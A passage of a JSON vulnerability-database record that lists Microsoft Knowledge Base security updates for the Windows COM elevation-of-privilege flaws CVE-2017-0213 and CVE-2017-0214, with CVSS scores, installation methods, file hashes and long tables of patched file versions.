["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}], "mskb": [{"lastseen": "2021-01-01T22:39:51", "description": "<html><body><p>Resolves a vulnerability in Windows Embedded POSReady 2009 and Windows Embedded Standard 2009.</p><h2>Summary</h2><div class=\"kb-summary-section section\">An elevation of privilege exists in Windows COM Aggregate Marshaler. An elevation of privilege vulnerability exists when Windows does not validate input correctly before it loads type libraries.<br/><br/>To learn more about the vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):<ul class=\"sbody-free_list\"><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-0213\" id=\"kb-link-2\" target=\"_self\">CVE-2017-0213</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-0214\" id=\"kb-link-2\" target=\"_self\">CVE-2017-0214</a></li></ul></div><h2>Fixes that are included in this security update</h2><ul><li>Addresses an issue in which some scanners and serial devices may stop working after security update <a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" href=\"https://support.microsoft.com/en-us/help/4074852/security-update-for-vulnerabilities-in-windows-wes09-and-posready-2009\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">4074852</a>\u00a0is applied.</li></ul><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><h3>Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faqx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>.</div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4466388\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website.</div></div><p><strong class=\"sbody-strong\">Important </strong></p><ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul><h2>More information</h2><h3>Prerequisites</h3><p>There are no prerequisites for installing this update.</p><h3>Restart information</h3><p>You may have to restart the computer after you apply this update.</p><h3>Update replacement information</h3><p>This update doesn't replace a previously released update.</p><h2>More information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><div class=\"kb-collapsible kb-collapsible-collapsed\"><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" managed-link=\"\" target=\"_blank\">Protect yourself online</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></span></div><span> </span></td></tr></tbody></table></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>WindowsXP-KB4466388-x86-Embedded-ENU.exe</td><td>A55F6E9011156548AB9722DE332F609B17B415D0</td><td>A742F8B84FF530CC7A0205B629C9677352EA85B258DE020224AC6D9E279A8A02</td></tr></tbody></table></td></tr></tbody></table><p><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows XP</strong></p><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">x86 Windows XP</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">SP requirement</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Kernel32.dll</td><td>5.1.2600.7593</td><td>993,792</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ntdll.dll</td><td>5.1.2600.7593</td><td>720,384</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ole32.dll</td><td>5.1.2600.7593</td><td>1,299,968</td><td>06-Nov-2018</td><td>06:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Oleaut32.dll</td><td>5.1.2600.7593</td><td>563,200</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Rpcss.dll</td><td>5.1.2600.7593</td><td>404,480</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Updspapi.dll</td><td>6.3.13.0</td><td>382,840</td><td>01-Feb-2018</td><td>21:28</td><td>x86</td><td>None</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-13T00:00:00", "type": "mskb", "title": "Description of the security update for the Windows COM elevation of privilege vulnerability in Windows Embedded POSReady 2009 and Windows Embedded Standard 2009: November 13, 2018", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0214", "CVE-2017-0213"], "modified": "2018-11-14T01:06:17", "id": "KB4466388", "href": "https://support.microsoft.com/en-us/help/4466388/", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-31T14:39:30", "description": "None\n## Summary\n\nAn elevation of privilege exists in Windows COM Aggregate Marshaler. An attacker who successfully exploits the vulnerability could run arbitrary code with elevated privileges. \n \nTo learn more about the vulnerability, go to [the Security Update Guide](<https://portal.msrc.microsoft.com>).\n\n## More Information\n\nImportant\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018556>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018556-ia64.msu| 78887F2993AED4D8DCEBA958A362134E40F5B116| 8996176D602E9F25899C25CCD9052404F3CCB02FBC265BB38D4A29DFA6A61B2C \nWindows6.0-KB4018556-x64.msu| 4728E8EAC4BD21D2F037349A59540EF40888177D| F399A7F1A58A299C10C72E206665CD23C0182E339F128A4E3835D6DC0ADF3546 \nWindows6.0-KB4018556-x86.msu| 7766800F74B02A4062E52BE4F39B4BB1C17E9849| 254A546922E4052BC2DD0036C67AABED643E6A2F8182C1D1663C9F1582DE1EA6 \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform**| **Service branch** \n---|---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 373,760| 06-Feb-2016| 03:25| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 255,488| 06-Feb-2016| 01:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 352,768| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 349,696| 06-Feb-2016| 03:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 346,624| 06-Feb-2016| 04:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 338,944| 06-Feb-2016| 03:21| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 373,760| 07-Apr-2017| 16:55| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 255,488| 07-Apr-2017| 15:25| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 352,768| 07-Apr-2017| 17:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 349,696| 07-Apr-2017| 16:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 346,624| 07-Apr-2017| 16:56| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 338,944| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 1,964,544| 06-Feb-2016| 01:39| IA-64| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 1,963,520| 07-Apr-2017| 15:16| IA-64| Not applicable \nOle32.dll| 6.0.6002.19773| 4,193,792| 14-Apr-2017| 20:16| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 4,188,160| 07-Apr-2017| 15:17| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.19773| 1,216,000| 14-Apr-2017| 20:16| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.24089| 1,220,096| 07-Apr-2017| 15:17| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 23,040| 14-Apr-2017| 21:45| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 20:18| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:16| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,064| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:13| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 13,824| 14-Apr-2017| 21:41| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 13:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 12,800| 14-Apr-2017| 21:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 13:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:52| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 13:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:56| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,040| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 15:20| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 15:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:45| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 13,824| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 12,800| 07-Apr-2017| 16:51| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:46| Not applicable| Not applicable \nComcat.dll| 6.0.6001.18000| 13,312| 19-Jan-2008| 08:26| IA-64| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:05| IA-64| Not applicable \nComcat.dll| 6.0.6002.24089| 13,312| 07-Apr-2017| 15:16| IA-64| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:36| IA-64| Not applicable \nCsrsrv.dll| 6.0.6002.19680| 145,920| 12-Aug-2016| 18:54| IA-64| Not applicable \nCsrsrv.dll| 6.0.6002.24089| 150,016| 07-Apr-2017| 15:16| IA-64| Not applicable \nKernel32.dll| 6.0.6002.19623| 2,191,360| 18-Mar-2016| 16:33| Not applicable| Not applicable \nKernel32.dll| 6.0.6002.24089| 2,193,920| 07-Apr-2017| 15:16| IA-64| Not applicable \nNtdll.dll| 6.0.6002.19623| 2,575,672| 21-Mar-2016| 22:52| IA-64| Not applicable \nNtdll.dll| 6.0.6002.24089| 2,552,048| 11-Apr-2017| 04:03| IA-64| Not applicable \nOleaut32.dll| 6.0.6002.19773| 2,023,424| 14-Apr-2017| 20:16| IA-64| Not applicable \nOleaut32.dll| 6.0.6002.24089| 2,025,472| 07-Apr-2017| 15:17| IA-64| Not applicable \nNtoskrnl.exe| 6.0.6002.19764| 9,484,008| 06-Apr-2017| 15:57| IA-64| Not applicable \nNtoskrnl.exe| 6.0.6002.24089| 9,469,672| 07-Apr-2017| 15:44| IA-64| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 3,298,816| 06-Feb-2016| 01:41| IA-64| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 3,289,088| 07-Apr-2017| 15:17| IA-64| Not applicable \nSmss.exe| 6.0.6002.19598| 159,232| 06-Feb-2016| 00:36| IA-64| Not applicable \nSmss.exe| 6.0.6002.24089| 159,232| 07-Apr-2017| 14:22| IA-64| Not applicable \nIa32exec.bin| 6.5.6524.0| 8,262,048| 07-May-2014| 23:57| Not applicable| IA64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.19598| 27,648| 06-Feb-2016| 01:41| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.19598| 524,288| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.19598| 43,008| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.19598| 617,984| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWowia32x.dll| 6.5.6563.0| 88,576| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nIa32exec.bin| 6.5.6524.0| 8,262,048| 07-Mar-2016| 23:41| Not applicable| IA64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 27,648| 07-Apr-2017| 15:17| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.24089| 524,288| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.24089| 43,008| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.24089| 617,984| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWowia32x.dll| 6.5.6563.0| 88,576| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nComcat.dll| 6.0.6000.16386| 7,168| 02-Nov-2006| 09:46| x86| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:01| x86| Not applicable \nComcat.dll| 6.0.6002.24089| 7,168| 07-Apr-2017| 15:23| x86| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:31| x86| Not applicable \nKernel32.dll| 6.0.6002.19623| 861,696| 18-Mar-2016| 17:10| x86| Not applicable \nKernel32.dll| 6.0.6002.24089| 862,720| 07-Apr-2017| 15:25| x86| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,171,488| 21-Mar-2016| 22:52| x86| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,167,880| 11-Apr-2017| 04:03| x86| Not applicable \nOleaut32.dll| 6.0.6002.19773| 574,464| 14-Apr-2017| 20:31| x86| Not applicable \nOleaut32.dll| 6.0.6002.24089| 574,464| 07-Apr-2017| 15:24| x86| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 679,424| 06-Feb-2016| 02:12| x86| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 678,912| 07-Apr-2017| 15:25| x86| Not applicable \nAcwow64.dll| 6.0.6002.19598| 43,008| 06-Feb-2016| 02:11| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.19598| 7,680| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.19598| 14,336| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.19598| 2,560| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.19598| 5,120| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAcwow64.dll| 6.0.6002.24089| 43,008| 07-Apr-2017| 15:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.24089| 7,680| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 14,336| 07-Apr-2017| 15:24| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.24089| 2,560| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.24089| 5,120| 07-Apr-2017| 15:25| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 356,352| 07-Apr-2017| 16:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 348,160| 07-Apr-2017| 16:44| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 802,816| 07-Apr-2017| 15:22| x86| Not applicable \nOle32.dll| 6.0.6002.19773| 1,321,472| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,318,912| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:50| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 20:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:19| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 07-Nov-2006| 03:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Nov-2006| 07:09| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 15:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 15:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:35| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:35| Not applicable| Not applicable \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform**| **Service branch** \n---|---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 371,200| 06-Feb-2016| 04:25| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,392| 06-Feb-2016| 04:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:22| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 373,760| 06-Feb-2016| 04:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:44| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 255,488| 06-Feb-2016| 02:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 381,952| 06-Feb-2016| 04:02| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 375,808| 06-Feb-2016| 03:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 366,080| 06-Feb-2016| 03:13| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 383,488| 06-Feb-2016| 05:05| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 03:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 352,768| 06-Feb-2016| 03:55| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 349,696| 06-Feb-2016| 05:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 374,272| 06-Feb-2016| 03:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 380,416| 06-Feb-2016| 04:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:07| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,392| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,904| 06-Feb-2016| 04:41| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:18| Not applicable| Not applicable 